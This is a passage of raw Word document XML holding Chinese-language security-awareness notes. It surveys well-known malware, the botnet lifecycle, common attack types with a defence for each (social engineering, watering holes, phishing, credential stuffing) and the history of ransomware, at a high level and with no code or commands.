    <w:p w14:paraId="01CB2BBA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ILOVEYOU</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（史上破坏力最强）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5939D6" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流氓软件：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2345</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全家桶</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0CBA95" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>勒索软件：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WannaCry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5ECFEE" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>僵尸网络</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435BA338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构建流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D91794E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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感染设备：通过漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>木马控制设备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E776A2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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建立通道：设备定期连接</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABF01C4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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发动攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB378AB" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>万台设备同时访问目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C29285C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>垃圾邮件：每台设备日发</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>万封</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FE5560" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码爆破：分布式尝试登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151DF269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惊人危害：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E951E8" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>僵尸网络：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年瘫痪美国东海岸网络</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F7FEC1" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规模记录：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Meris</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>僵尸网络（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>万台设备）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F52B45" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经济影响：单次</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击可致企业损失百万</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D89EB40" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>其他攻击手段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F12F9C0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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>社工攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06040C33" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:left="480" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪装</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>人员索要密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6454C503" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:left="480" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防御：验证身份（工号</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部门确认）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2316DEAE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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>跳板攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6983D7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黑客入侵</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公司</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公司网络攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公司</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF3A5A6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防御：网络分段隔离</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1726A347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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>水坑攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4052A9B1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入侵行业网站（如律师协会）→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>植入木马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E44CF68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防御：使用浏览器沙盒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D59608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b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>APT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE99529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lastRenderedPageBreak/>
        <w:t>国家级黑客组织（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>APT28</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380C213C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潜伏数月窃取机密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4463BE62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防御：威胁情报</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418B894C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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>钓鱼攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211EFE54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伪装成</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工资明细</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的带毒</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Excel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0FAE90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识别：检查发件人邮箱（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hr@company.com </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>≠</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> hr@companny.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA8A02F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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>拖库</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>洗库</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>撞库：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6915E4B1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拖库：入侵</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>窃取用户数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F34E4B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洗库：整理数据（账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手机号）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0F4D9E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撞库：用相同账号密码尝试登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12216CFC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防御：不同网站使用不同密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275EB712" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>勒索病毒攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A1F7DD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三代演进史：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAEE0AF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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一代（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1989-2013</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE55BE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代表：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AIDS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>木马（首个勒索软件）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385C2E65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特点：简单加密文件，索要</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>189</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>美元</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436CA066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危害：仅影响个人用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39523C60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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二代（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2013-2016</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E3081E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代表：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CryptoLocker</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RSA-2048</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABB272F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特点：通过僵尸网络传播</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DB306E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危害：感染超</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>万台设备，获利</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>300</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>万美元</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDDDDA1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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
